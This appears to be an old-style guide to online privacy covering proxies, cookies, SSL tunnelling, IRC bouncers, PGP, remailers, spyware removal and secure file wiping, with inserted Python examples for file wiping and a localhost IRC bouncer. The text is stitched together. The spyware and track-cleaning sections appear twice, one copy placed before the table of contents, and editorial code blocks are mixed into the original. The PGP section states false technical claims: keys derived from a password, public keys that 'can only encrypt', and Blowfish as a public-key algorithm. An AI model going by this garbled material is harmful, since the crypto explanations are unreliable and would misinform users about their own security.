Spyware is software bundled with many programs that you download for free. Its function is to gather personal information about you and relay it back to advertising firms. The information is then used either to offer you products, or is sold to other advertisers so they can promote THEIR products. They claim this is all they do with the information, but the problem is nobody really knows for sure.
Spyware fits the classic definition of a trojan, as it is something you did not bargain for when you agreed to download the product. Not only is spyware an invasion of your privacy, but (especially if you have a few different kinds on your machine) it can also chew up bandwidth, making your Internet connection slower.
Sometimes these spies really are harmless, merely connecting back to the home server to deliver you more advertising. Others, like Gator for instance, send out detailed information about your surfing habits, operating system, income, age demographic et cetera.
Avoiding spyware
Avoiding spyware is getting harder and harder, as more software distributors choose it as a way of profiting from freeware and shareware distributions. Be leery of programs with cute little icons like Gator. Also watch those Napster wannabes like AudioGalaxy, Limewire, and Kazaa. I've yet to find one that didn't include spyware. Before you download, check whether the program is known to contain spyware.
For a list of most known spyware, the best I've found is here:
http://www.infoforce.qc.ca/spyware/enknownlistfrm.html
Getting rid of spyware
In most cases you can remove the spyware from your system and still use the application you downloaded. In the case of Gator and Comet Cursor, the whole program is spyware and it must be completely removed to stop the spying.
There are several ways to get rid of spyware on your system. You can use a firewall to monitor outgoing connections. The programmers that put these things together, however, are getting sneakier and sneakier about circumventing firewalls. Comet Cursor, for instance, phones home with an ordinary HTTP POST request, which a firewall that allows web browsing lets through without question. You can also install a registry monitor such as Regmon to watch for unwanted registry changes, but this is not foolproof either.
Probably the best method of removal is to download a spyware removal program and run it as you would a virus scanner. The best examples of these programs are:
Lavasoft's Adaware, available at http://www.lavasoftusa.com/ Or professional cybernut Steve Gibson's OptOut, available at http://grc.com/optout.htm Both of these programs are free and are updated regularly.
Here are some links, if you wish to learn more about spyware:
http://www.spychecker.com/
http://grc.com/optout.htm
http://www.thebee.com/bweb/iinfo200.htm
[ cleaning tracks ]
Resources:
Burnt Cookies - allows automatic detection and optional deletion of Cookies deposited by Banner Ad web-sites
http://www.andersson-design.com/bcookies/index.shtml
Surfsecret - automatically kills files like your Internet cache files, cookies, history, temporary files, recent documents, and the contents of the Recycle Bin.
http://www.surfsecret.com/
Note: One side note on cleaning tracks. When you delete files on your machine, they aren't actually deleted. Only the reference to their location on the hard drive is removed, which makes the OS think that that part of the disk is free and ready to be reused. Thus there are ways to recover data even after you delete it.
There are, however, several ways to _wipe_ this information. Programs that fill the file's disk blocks with zeros, then with ones, over several passes are your best bet to make sure no document goes into the wrong hands. One such program is PGP: PGPi now comes with a utility that does this work, and you can even select the number of passes used to wipe files. For *nix there is also the "wipe" program. Use these when you have data that needs secure cleaning. Keep in mind that overwriting only reaches the blocks the file currently occupies: copies in swap, temporary files or backups are not touched, and on journaling file systems or flash media the old data may already have been relocated elsewhere.
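As an added illustration of the multi-pass overwrite described above (not from the original text, and not the code of PGP's or the "wipe" utility), here is a small Python routine: zeros, then ones, then random bytes, each pass forced to disk with fsync, followed by a truncate and unlink. The function names, the pass patterns and the sample file content are my choices. The demo writes a marker into a temporary file, overwrites it, and checks that nothing of the marker remains in the file itself before removing it; the limits noted above (swap, backups, journaling file systems, flash wear levelling) still apply, which is why full-disk encryption is the more reliable answer on such systems.

```python
import os
import tempfile

# Pass patterns: all zeros, all ones, then random bytes; cycled for more passes.
PATTERNS = (b"\x00", b"\xff", None)


def overwrite_in_place(path, passes=3, chunk=1 << 16):
    """Overwrite every byte of the file `passes` times, forcing each pass to disk.

    Only the blocks the file occupies right now are reached; see the caveat
    in the text about swap, backups, journals and flash media."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for i in range(passes):
            pat = PATTERNS[i % len(PATTERNS)]
            f.seek(0)
            left = size
            while left > 0:
                n = min(left, chunk)
                f.write(os.urandom(n) if pat is None else pat * n)
                left -= n
            f.flush()
            os.fsync(f.fileno())   # do not let the OS merge passes in its cache
    return size


def wipe_file(path, passes=3):
    """Overwrite, truncate to zero (hides the old length), then unlink."""
    overwrite_in_place(path, passes)
    with open(path, "r+b") as f:
        f.truncate(0)
        f.flush()
        os.fsync(f.fileno())
    os.remove(path)


def demo():
    """Returns (marker_still_present, file_all_ones_after_pass_2, file_exists)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "secret.txt")
        with open(path, "wb") as f:
            f.write(b"SECRET-MARKER " * 100)      # constructed sample content
        overwrite_in_place(path, passes=2)          # zeros, then ones
        with open(path, "rb") as f:
            after = f.read()
        wipe_file(path)                             # full wipe and unlink
        return b"SECRET" in after, set(after) == {0xFF}, os.path.exists(path)
```

After two passes the file holds nothing but 0xFF bytes, and after wipe_file() it is gone from the directory as well.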
[ t a b l e o f c o n t e n t s ]
01 - table of contents
02 - introduction
03 - first tips
04 - about proxies
05 - cookies
06 - ftp transfers
07 - secure transactions
08 - SSL tunnelling
09 - anonymity on irc
10 - mail crypto (and pgp usage)
11 - icq privacy
12 - spyware
13 - cleaning tracks
14 - ending words
[ introduction ]
Nowadays everyone wants privacy on the web, because no matter where you go, someone could be watching you. Your employer, someone trying to hack your system, companies gathering all your info to sell to yet other companies, or even the government may be on your track while you peacefully surf the web. Anonymity on the web thus means being able to use all of its services without having to worry about someone snooping on your data.
Your computer, being connected to the net, has an IP (Internet Protocol) address. If you have a dial-up connection, your IP usually changes every time you connect to the Internet (this is not always true, though: there are dial-up ISPs, especially for university students, that do hand out static IPs). Cable modem and DSL connections usually have a static IP, which means that the address does not change. One of the goals of getting anonymous is to make sure your IP, static or dynamic, isn't revealed to other users of the Internet, or to the administrators of the servers you use.
This text tries to give you some hints on how to maintain your anonymity on the web. Some of the hints may sound banal, but think about whether you really follow them in every situation.
[ first tips ]
When chatting on IRC, ICQ, AIM (etc.), do not give out personal information about yourself: where you live, work, etc.
Do not use your primary e-mail address (the one your ISP gave you) anywhere except with family members, close friends or trusted people. Instead create a web-based e-mail account for yourself, such as Yahoo, Hotmail, dynamitemail, mail.com, etc., and use that address for signing up for services, when you need to give an address to download something, or to publish on your homepage.
When signing up for services on the web, don't give your real information like address, phone number and such unless you really need to. This is the kind of information that information-gathering companies like to get, so that they can sell it on and fill your mailbox with spam.
Use an anonymous proxy to surf the web. This makes sure your IP doesn't get stored in the web server's logs. (Web servers log every GET request made, together with date, time and IP. This is where the proxy comes in: the server logs the proxy's IP, not yours.)
Use a bouncer to connect to IRC networks, in case you don't trust the administrators or the other users. A bouncer is a program that sits on a permanently connected machine and lets you connect there, and from there to the IRC server, just like a proxy works for web servers.
Use anonymous remailers to send out your e-mails.
Cryptography can also help you by making sure the material you send out over the web, by e-mail etc., is enciphered, so that nobody without your key can read it (in key-based cryptography). Programs like PGP (Pretty Good Privacy) are toolkits with all you need to encipher and decipher your stuff.
Delete traces of your work with the computer, including history files, cache and backup files.
[ about proxies ]
Proxies are caches that relay data. When you configure your web browser to use a proxy, it never connects to the URL directly. Instead it always connects to the proxy server and asks it to fetch the URL for you. It works similarly with other types of services such as IRC, ICQ etc. There is no direct connection between you and the server, so your real IP address is not revealed to it: when you view a website, the server sees the proxy's IP, not yours. (The proxy itself, of course, sees both and may log them.) Some web proxies do not forward cookies, which some websites (for example Hotmail) require.
Here are some anonymous proxies that you can use to surf anonymously (notice that some of these may be a paid service):
Aixs - http://aixs.net/
Rewebber - http://www.anon.de/
Anonymizer - http://www.anonymizer.com/
The Cloak - http://www.the-cloak.com/
You will very probably find websites that provide lists of unauthorised proxies and remailers. Such lists are usually compiled with the help of port scanners or exploit scanners, scanning for computers running WinGate or other proxies with open or backdoored configurations. Using these proxies is illegal and is considered unauthorised access to a computer. If such a list gets into your hands, check whether the info is legal or compiled by a script kiddie, and act accordingly.
If you decide not to use a proxy anyway, at least do not forget to remove your personal information from your browser. After you remove details like your name and e-mail address, the only info a website can sniff out is your ISP's address and geographical location. Also, Java and JavaScript applets can take control of your browser unexpectedly, and if you are surfing to unknown and potentially dangerous places you should be aware of that. Exploitable browser bugs (mainly Internet Explorer ones) are reported every week.
[ cookies ]
Maybe you're not aware of the fact that if you have the "allow cookies" feature in your browser turned on, websites can store all sorts of information on your hard drive. Cookies are small files that contain various kinds of information that can be read by the websites that set them when you visit them again. The usual usage is to track demographics for advertising agencies that want to see just what kinds of consumers a certain site is attracting. Websites also use cookies to keep your account information up to date. For instance, when you visit your web-based e-mail account some hours later without having logged out, you find yourself still logged in, even if you turned off your computer in between. Your session (sometimes even your login and password) was simply stored on your hard drive in a cookie file. This is a security threat if more than one person has access to your computer.
Most browsers offer the possibility to turn cookies off, but some sites like Hotmail.com require them to be turned on. If you decide to allow cookies, at least never forget to log off from the websites when you have finished visiting them.
[ ftp transfers ]
When using an FTP client program to download files from anonymous FTP servers, make sure it gives a bogus password, like guest@unknown.com, not your real e-mail address. If your browser lets you, turn off the feature that sends your e-mail address as the password for anonymous FTP sessions.
[ secure transactions ]
Everything sent from a web server to your browser is usually plain text. That means all transferred information can easily be sniffed on the route. Some web servers support SSL (which stands for Secure Socket Layer). To view and use these websites you'll need SSL support in your browser as well. You can recognise that the connection is encrypted if the URL starts with https:// instead of the usual http:// (and the browser shows its padlock without complaining about the certificate). Never use a web server without SSL for sending or receiving sensitive private or business information (credit card numbers, passwords etc.).
[ SSL tunnelling ]
What is SSL?
SSL stands for Secure Socket Layer. The "Secure" implies encryption, while "Socket Layer" says that it sits on top of the ordinary socket interface (Winsock on Windows, BSD sockets elsewhere) rather than inside the application. For those that don't know, a socket is the endpoint of a connection to a port on a system; a server can serve many sockets on one listening port, one per connected client.
A secure socket layer means that any traffic carried under it is encrypted and protected against tampering. The idea behind SSL was to provide an encrypted, and thus secure, route for traffic along a socket based system such as TCP/IP (the Internet protocol). This allows secure credit card transactions on the Internet, protected communication along a data line, and overall peace of mind.
SSL was developed by Netscape and uses public key algorithms from RSA, a world respected American company that specializes in encryption and data security, together with symmetric ciphers for the bulk data. Initially many browsers shipped with a symmetric key length of only 40 bits for use with SSL, because of US export restrictions; this was considered weak, and 128-bit ciphers became the norm once those restrictions were relaxed. The reasoning behind it was simple: it needs to be secure.
The RSA site puts the advantage of a longer key length pretty clearly: 40-bit encryption is considered relatively weak, and a 128-bit key space is 2^88, about 309 septillion times (309,485,000,000,000,000,000,000,000) larger than a 40-bit one. It would take that many times longer to brute-force 128-bit encryption than 40-bit.
If you want more information on the technicalities of RSA's SSL encryption engine, visit their site: http://www.rsasecurity.com/standards/ssl.
But what does all this encryption and security have to do with you?
Well, that's a simple question. No matter how hard you try, at times your privacy will need to be knowingly invaded so you can make use of the product offered for doing so. If you think about food, for example, one cannot eat without swallowing. When we wish to make a transaction or view a site on the Internet, where we have to give enough information away so that it happens, we also want to be assured no one else along the line gathers that data. An encrypted session means our data is not in the hands of any privacy perpetrators unless they know how to decode it, and the only ones in the know are those you specifically wish. SSL uses public key encryption as explained in the PGP section.
To put this at a head: if you use an encrypted connection or session, you can be relatively assured that there are no prying eyes along the way, provided the server's certificate checks out. SSL protects the wire, not the server at the far end.
And how do I implement SSL with SSL tunnelling?
We know that a Secure Socket Layer is safe, but what we don't know is what a tunnel is. In the most simplistic form, a tunnel is a proxy. Like a proxy vote in a general election, a tunnel relays your data back and forth for you. You may be aware that there are already "proxies" out there, and that is true. Tunnelling is done via proxies, but it is not considered the same as ordinary proxy relaying, simply because it isn't.
Tunnelling is a very special kind of proxy relay, in that it relays data without interfering with it. It does this transparently, without grievance or any care for what passes its way.
Now, if we add this ability to tunnel any data through a pipe to the Secure Sockets Layer, we have a closed connection that is independent of the software carrying it, and encrypted as well. For those wanting to know a little more about the technicalities: the tunnel cannot interfere with the data passed back and forth, because it is encrypted end to end and any tampering would be detected. That is what lets an SSL-capable proxy (one that honours the HTTP CONNECT method) hand the data out of its proxied connection to the destination required.
So to sum up, we have both a secure connection that does the job and relays things in the right direction, and a direct tunnel that doesn't care what we pass through it. Two very useful, and almost blind, entities. All we need now is a secure proxy that we can use as the tunnel.
Proxies:
Secure proxies are like standard proxies. We can either use an HTTP-based, SSL-equipped proxy (one designed for passing HTTPS traffic, which, because SSL is opaque to it, can be bent to carry anything), or use a proper SSL service designed for our connection, like you would use a secure NNTP (news) program with a secure news server on port 563 instead of taking the long way round, which would probably work as well.
An HTTPS server operates on port 443, and an HTTP proxy that supports CONNECT will relay to it. Most proxies are not public, that is, they operate for, and allow traffic only from, their own subnet or the ISP that runs them; but there are many badly configured HTTP proxies and some public ones out there. The original text recommends HTTrack (available on Neworder) for scanning for proxies, but HTTrack is a website mirroring tool; a port scanner is what finds open proxies, and running one against networks that are not yours is the unauthorised use warned against in the proxies section. If your ISP provides a proxy, use that.
Neworder also features a number of sites dedicated to listing public proxies in its Anonymity section. While it's often hard to find a suitably fast proxy, it's worth the effort when you get one.
So how can I secure my connections with SSL Tunnelling?
That's a big question, and beyond the scope of this text, which must come to an end. I can however point you to two resources that will aid you in tunnelling IRC, and most other connections, via an HTTP proxy.
For Windows, the first stop would be Socks2HTTP from http://www.totalrc.net. This is a tunnelling program that turns a normal SOCKS proxy connection into a connection tunnelled through an HTTP proxy's SSL port.
The second stop, for both Windows and Unix, is stunnel. Stunnel is a GPL-licensed program for wrapping any TCP connection in SSL. It is available as source and as binaries here: Stunnel homepage - http://mike.daewoo.com.pl/computer/stunnel
[ anonymity on irc ]
A BNC, or bouncer, is used in conjunction with IRC as a way of hiding your host when people /whois you. On most IRC networks your host isn't masked in a whois, meaning the entire IP appears, like 194.2.0.21, which can be resolved. On other networks your host might be masked, like IRCnetwork-0.1, but it can still give away valuable information, like nationality: if your host is not an IP but a DNS-resolved name like my.host.cn, it would be masked to IRCnetwork-host.cn, which still tells the person who whoised you that you are in China.
To keep information such as this hidden from the other users on an IRC network, many people use a bouncer, which is actually just a proxy. Let us first draw a schematic of how a connection looks with and without a BNC installed.
Without a BNC:
your.host.cn <<-->> irc.box.sk
With a BNC:
your.host.cn <<-->> my.shell.com <<-->> irc.box.sk
You will notice the difference between the two. When you have a BNC installed, a shell functions as a link between you and the IRC server (irc.box.sk as an example). You install a BNC on a shell and set a port for it to listen for connections on. You then connect to the shell with your IRC client (BitchX/XChat/mIRC), and the bouncer logs in to the IRC server you specify, irc.box.sk in this case. In effect this changes your host: it is my.shell.com that makes all the requests to irc.box.sk, and irc.box.sk never learns of your.host.cn; it has never even made contact with it.
In that way, depending on what host your shell has, you can log in to IRC with a host like i.rule.com. Such vhosts are then just an alias for your own machine, your.host.cn, and it is all completely transparent to the IRC server.
Many IRC servers run proxy-checking bots that test every connecting host for an open proxy (a SOCKS server, normally on port 1080). A BNC is not an open proxy and cannot be detected by such a simple check; unless your shell also has an open SOCKS port, it will let you in with no problem at all. The shell is not acting as a generic proxy like you might expect, but as an IRC-specific relay, or IRC router. In one way, the BNC just relabels your traffic and sends it on, like:
to:   my.shell.com  ->  to:   irc.box.sk    ->  to:   my.shell.com
from: your.host.cn  <-  from: my.shell.com  <-  from: irc.box.sk
The BNC simply swaps the host on your traffic, so that it appears to come from my.shell.com. (Strictly speaking it does not rewrite packets: it terminates your TCP connection on the shell and opens a separate one to the server.) But be aware that your own machine is perfectly aware that it has a connection established with my.shell.com, and that YOU know you are connected to irc.box.sk.
Some BNCs are used inside IRC networks to simulate one host. If you had a global IRC network, all linked together, you could have a local server called cn.myircnetwork.com which Chinese users would log into. It would then bounce them to the actual network server, in effect giving all users from China the same host, cn.myircnetwork.com, and masking their real hosts. Of course, you could change the host too, so it didn't reveal the nationality. It is a nice gesture of some networks that they mask all hosts from everyone; it makes life harder for IRCops on the network, but that is a small price to pay for privacy.
Note: Even if you do use an IRC bouncer, your IP will be revealed in DCC transfers or DCC chat, because DCC requires a direct IP-to-IP connection. A usual mistake of IRC users is to have DCC auto-accept turned on. It is then easy for an attacker to DCC chat you or offer you a file, and once the clients are connected he can read your IP address off the list of his TCP/IP connections (netstat).
How do I get an IRC bouncer?
you download and install bouncer software, or get someone to install it for you (probably the best known and best bouncer available is BNC, homepage: http://gotbnc.com/)
you configure and start the software; if it is a bouncer on a Unix machine, you start it on your shell account (let's say shell.somewhere.com)
you open IRC and connect to the bouncer at shell.somewhere.com on the port you told it to start on
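As an added example (it is not BNC's code and not from the original text), here is a minimal bouncer in Python that does what the diagram above shows: it accepts a client on the shell and splices it to its own connection to the IRC server, so the server records the shell's address, never the client's. The fake IRC server, the one-connection limit and the localhost addresses are my assumptions so the demo runs offline; a real BNC keeps the upstream session alive when you disconnect and asks for a password, both left out here. The DCC caveat from the text still holds: nothing the bouncer does protects a direct connection your client opens by itself.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes one way until the source closes, then close that direction."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def bounce_one(listener, irc_host, irc_port, via):
    """The BNC role: accept one client on the shell, open our own connection
    to the IRC server and splice the two. The server only ever sees `via`."""
    client, _ = listener.accept()
    upstream = socket.create_connection((irc_host, irc_port))
    via.append(upstream.getsockname())      # the address the IRC server will log
    t = threading.Thread(target=_pump, args=(client, upstream))
    t.start()
    _pump(upstream, client)
    t.join()
    client.close()
    upstream.close()


def fake_irc_server(listener, seen):
    """Stand-in for irc.box.sk: records the peer it sees and tells it back."""
    conn, peer = listener.accept()
    seen.append(peer)
    with conn:
        while conn.recv(4096):              # read NICK/USER until the client is done
            pass
        conn.sendall(b":irc.box.sk NOTICE * :you are connecting from %s:%d\r\n"
                     % (peer[0].encode(), peer[1]))


def _listen():
    s = socket.socket()
    s.bind(("127.0.0.1", 0))                # ephemeral port on localhost (assumption)
    s.listen(1)
    return s


def demo():
    """your.host <-> bouncer <-> irc, all on localhost.
    Returns (peer the IRC server saw, bouncer's upstream address, client address, reply)."""
    socket.setdefaulttimeout(5)
    irc, bnc = _listen(), _listen()
    seen, via = [], []
    threads = [
        threading.Thread(target=fake_irc_server, args=(irc, seen)),
        threading.Thread(target=bounce_one, args=(bnc, *irc.getsockname(), via)),
    ]
    for t in threads:
        t.start()
    with socket.create_connection(bnc.getsockname()) as c:   # the IRC client
        c.sendall(b"NICK anon\r\nUSER anon 0 * :anon\r\n")
        c.shutdown(socket.SHUT_WR)          # tell the bouncer we are done sending
        client_addr = c.getsockname()
        reply = b""
        while True:
            data = c.recv(4096)
            if not data:
                break
            reply += data
    for t in threads:
        t.join()
    irc.close()
    bnc.close()
    return seen[0], via[0], client_addr, reply
```

The address the server recorded is the bouncer's own upstream socket, not the client's; the client still gets the server's reply, relayed through the shell, exactly as in the "With a BNC" diagram.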
all depending on the setup, you may have to tell it your password and tell it where to connect, and you're now on irc as shell.somewhere.com instead of your regular hostname [ mail crypto ] Usually the safest way to ensure that your e-mail won't be read by unauthorised persons is to encrypt them. To be compatible with the rest of the world I'd suggest to use free PGP software. PGP (Pretty Good Privacy) is a piece of software, used to ensure that a message/file has not been changed, has not been read, and comes from the person you think it comes from. Download location: http://www.pgpi.org/ How does pgp Work? The whole idea behind PGP is that of Public and Private keys. To explain the algorithm PGP uses in order to encrypt the message would take too much time, and is beyond the scope of this, we will however look at how it ensures the integrity of the document. A user has a password, this password has to be chosen correctly, so don't choose passwords like "pop" or "iloveyou", this will make an attack more likely to succeed. The password is used to create a private key, and a public key - the algorithm ensures that you can not use the public key to make the private key. The public key is sent to a server, or to the people you send e-mails/files, and you keep the private key secret. We will use a few terms and people in this introduction, they are: Pk - Public Key, Sk - Secret Key (private key). Adam will send an e-mail to Eve, and Rita will be a person in between, who we are trying to hide the content of the mail from. Rita will intercept the email (PGP doesn't ensure that Rita cant get her hands on the package, she can - its not a secure line like other technologies) and try to read it/modify it. Adam has a Sk1 and a Pk1, and Eve has a Sk2 and a Pk2. Both Adam, Eve, and Rita have Pk1 and Pk2, but Sk1 and Sk2 are presumed to be totally secret. 
First, here is a schematic of how it all looks: PUBLIC SERVER Pk1, Pk2 Adam <------------------------------------------> Eve Sk1 ^ Sk2
|
|
|
|
Rita
So Adam wants to send a packet to Eve, without Rite reading it, or editing it. There are three things that we need to make sure:
That Rita cant read the text without permission
That Rita cant edit it in any way, without Eve and Adam knowing
That Even knows that Adam sent it
First thing is making sure Rita cant read the text. Adam does this by encrypting the message with Eves Pk2 which he has found on the server. You can only Encrypt with the Pk, not decrypt, so Rita wont be able to read the data unless Eve has revealed her Sk2.
The second thing to make sure, is that Rite cant edit the message. Adam creates a hash from the message he has created. The hash can be encrypted using Pk2, or sent as it is. When Eve gets the message, she decrypts it, and creates a hash herself, then checks if the hashes are the same - if they are, the message is the same, if its different, something has changed in the message. The Hash is very secure, and it is in theory impossible to make a change, and get the hash to remain the same.
The third, and probably one of the most important things to ensure, is that Rita hasn't grabbed the mail, made a new one, and sent it in Adams name. We can ensure this by using Public key and Private key too. The Sk can be used both to encrypt and to decrypt, but Pk can only encrypt. When Adam normally sends a message M to Eve, he creates the encrypted message C by doing: C=Pk2(M). This means, Adam uses Pk2 (Eves Pk) on message M to create message C. Image this: Adam can encrypt the message with his Sk1, because it is impossible to derive Sk1 from the message, this is secure and without any danger, as long as no one knows the password used to make Sk1 with. If the message M is encrypted with Sk1, he gets a message called X, Eve can decrypt the message using Pk1 which is public. If the message decrypts to something that makes sence, then it must be from Adam, because Sk1 is considered as secret, and only Adam knows it.
The entire process looks like this, when sending message C: Adam signs his digital signature on C, and hashes C: X=Sk1(C). Then Adam encrypts the message for Eve: M=Pk2(X). The message is sent, and looks all in all like this: M=Pk2(Sk1(C)). Rita can intercept M, but not decrypt, edit, or resend it. Eve receives M, and decrypts it: X=Sk2(M). Then she checks the digital signature: C=Pk1(X) and checks the Hash on the way.
This way, the PGP Public/Private key system ensures integrity and security of the document e-mail, but PGP is not the only algorithm that uses the Public/Private key theory, Blowfish, and RSA are among the many other technologies that use it, PGP is just the most popular for e-mail encryption, but many don't trust it because of rumors of backdoors by the NSA (I don't know if its true though). PGP comes in a commercial, and a freeware version for Windows, and is available for Linux as well. What ever encryption you use, it will be better than none.
[ anonymous remailers ]
Remailers are programs accessible on the Internet that route email and USENET postings anonymously (i.e., the recipient cannot determine who sent the email or posted the article). This way the sender can't be traced back by routing headers included in the e-mail. There are different classes of remailers, which allow anonymous exchange of email and anonymous posting to USENET and often many other useful features.
Resources:
Chain is a menu-driven remailer-chaining script:
http://www.obscura.com/crypto.html
Raph Levien's remailer availability page offers comprehensive information about the subject
http://www.sendfakemail.com/~raph/remailer-list.html
The Cypherpunks Remailers are being developed to provide a secure means of providing anonymity on the nets. Here you can find out about the available remailers, those which have been standard in existance for a long time as well as the new experimental remailers and anonymous servers.
http://www.csua.berkeley.edu/cypherpunks/remailer/
[ icq privacy ]
How can I keep my privacy at ICQ?
Send and receive messages via the ICQ server, not directly. Every direct connection lets an attacker learn your IP. Encrypt your messages with dedicated software (encryption add-ons).
How to encrypt ICQ messages?
There are add-ons that give your ICQ the ability to encrypt outgoing messages. The user on the other side needs to have the add-on as well in order to decrypt your message.
Resources:
http://www.encrsoft.com/products/tsm.html
Top Secret Messenger (TSM) - trial version has only weak 8-bit encryption
http://www.planet-express.com/sven/technical/dev/chatbuddy/default.html
Chat Buddy - a freeware Windows application for encrypting chat sessions
http://www.algonet.se/~henisak/icq/encrypt-v5.txt
how encryption works in ICQ protocol v5
[ spyware ]
As we all work hard to become more savvy about protecting our personal information and keeping as anonymous as possible on the web, advertising companies are working just as hard to come up with new ways of getting our personal information. One of the ways they accomplish this is through spyware.
Spyware is software bundled with many of the programs you download for free. Its function is to gather personal information about you and relay it back to advertising firms. The information is then used either to offer you products or sold to other advertisers, so they can promote THEIR products. They claim this is all they do with the information, but the problem is that nobody really knows for sure.
Spyware fits the classic definition of a trojan, as it is something you did not bargain for when you agreed to download the product. Not only is spyware an invasion of your privacy, but (especially if you have a few different kinds on your machine) it can also chew up bandwidth, making your Internet connection slower.
Sometimes these spies really are harmless, merely connecting back to the home server to deliver you more advertising. Others, like Gator for instance, send out detailed information about your surfing habits, operating system, income, age demographic, et cetera.
Avoiding spyware
Avoiding spyware is getting harder and harder, as more software distributors choose it as a way of profiting from freeware and shareware distributions. Be leery of programs with cute little icons like Gator. Also watch those Napster wannabes like AudioGalaxy, Limewire, and Kazaa; I've yet to find one that didn't include spyware. Before you download, check whether the program is known to contain spyware.
For a list of most known spyware, the best I've found is here:
http://www.infoforce.qc.ca/spyware/enknownlistfrm.html
Getting rid of spyware
In most cases you can remove the spyware from your system and still use the application you downloaded. In the case of Gator and Comet Cursor, the whole program is spyware and it must be removed completely to stop the spying.
There are several ways to get rid of spyware on your system. You can use a firewall to monitor outgoing connections. The programmers who put these things together, however, are getting sneakier and sneakier about circumventing firewalls: Comet Cursor, for instance, uses an HTTP POST to connect without the firewall intervening. You can also install a registry monitor such as Regmon to watch for unwanted registry changes, but this is not foolproof either.
Probably the best method of removal is to download a spyware removal program and run it like it was a virus scanner. The best examples of these programs are:
Lavasoft's Adaware, available at http://www.lavasoftusa.com/
Professional cybernut Steve Gibson's OptOut, available at http://grc.com/optout.htm
Both of these programs are free and are updated regularly.
Here are some links, if you wish to learn more about spyware:
http://www.spychecker.com/
http://grc.com/optout.htm
http://www.thebee.com/bweb/iinfo200.htm
[ cleaning tracks ]
Resources:
Burnt Cookies - allows automatic detection and optional deletion of Cookies deposited by Banner Ad web-sites
http://www.andersson-design.com/bcookies/index.shtml
Surfsecret - automatically kills files like your Internet cache files, cookies, history, temporary files, recent documents, and the contents of the Recycle Bin.
http://www.surfsecret.com/
Note: One side note on cleaning tracks. When you delete files on your machine, they aren't actually deleted. Only the reference to their location on the hard drive is removed, which makes the OS think that location on the HD is free and ready to be reused. Thus there are ways to recover data even after you delete it.
There are, however, several ways to _wipe_ this information. Programs that fill the hard disk locations with zeros, then with ones, over several passes are your best bet to make sure no document ends up in the wrong hands. One such program is PGP: PGP now comes with a utility that does this work, and you can even select the number of passes used to wipe files. For *nix there is also the "wipe" program. Use these when you feel you have data that needs secure cleaning.
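The overwrite-before-unlink idea above, as an added Python example that is not part of the original post or of any of the tools it names: each pass fills the file with a pattern (zeros, ones, then random bytes), flushes it to disk, and the file is truncated, renamed to a random name so the directory entry stops leaking the filename, and only then removed. The function names, the pattern order and the sample file are my own choices. In-place overwriting only helps when the filesystem writes the new bytes to the same blocks; journaling or copy-on-write filesystems and SSD wear-levelling can leave earlier copies behind, which is why full-disk encryption or a device-level secure erase is the safer answer on modern hardware.

```python
"""Multi-pass file overwrite, illustrating why 'delete' alone is not 'wipe'."""
import os
import secrets
import tempfile

CHUNK = 1 << 16
# Pass patterns: all zeros, all ones, then random bytes (None means random).
PATTERNS = (b"\x00", b"\xff", None)


def fill_pass(f, size, pattern):
    """Overwrite the first `size` bytes of an open file with one pattern and
    force the data to disk before the next pass starts."""
    f.seek(0)
    left = size
    while left > 0:
        n = min(left, CHUNK)
        f.write(secrets.token_bytes(n) if pattern is None else pattern * n)
        left -= n
    f.flush()
    os.fsync(f.fileno())


def wipe_file(path, passes=3):
    """Overwrite `path` in place for `passes` passes, truncate it, rename it to a
    random name so the directory entry no longer reveals the filename, then unlink.
    Returns the number of passes performed."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for i in range(passes):
            fill_pass(f, size, PATTERNS[i % len(PATTERNS)])
        f.truncate(0)
        f.flush()
        os.fsync(f.fileno())
    scrambled = os.path.join(os.path.dirname(path), secrets.token_hex(8))
    os.rename(path, scrambled)
    os.remove(scrambled)
    return passes


def demo():
    """Create a constructed sample file, show that one pass really replaces the
    content on disk, then wipe it. Returns observations a caller can check."""
    fd, path = tempfile.mkstemp(prefix="wipe-demo-")
    sample = b"constructed sample: draft e-mail, do not leak\n" * 64
    with os.fdopen(fd, "wb") as f:
        f.write(sample)
    size = os.path.getsize(path)
    results = {"size": size}
    with open(path, "r+b") as f:
        fill_pass(f, size, b"\x00")
        f.seek(0)
        results["zeroed"] = f.read() == b"\x00" * size  # the old bytes are gone
    results["passes"] = wipe_file(path)
    results["removed"] = not os.path.exists(path)
    return results


if __name__ == "__main__":
    print(demo())
```

The fsync after every pass matters: without it the operating system may merge the passes in its write cache and commit only the last pattern, so the intermediate overwrites never reach the disk at all.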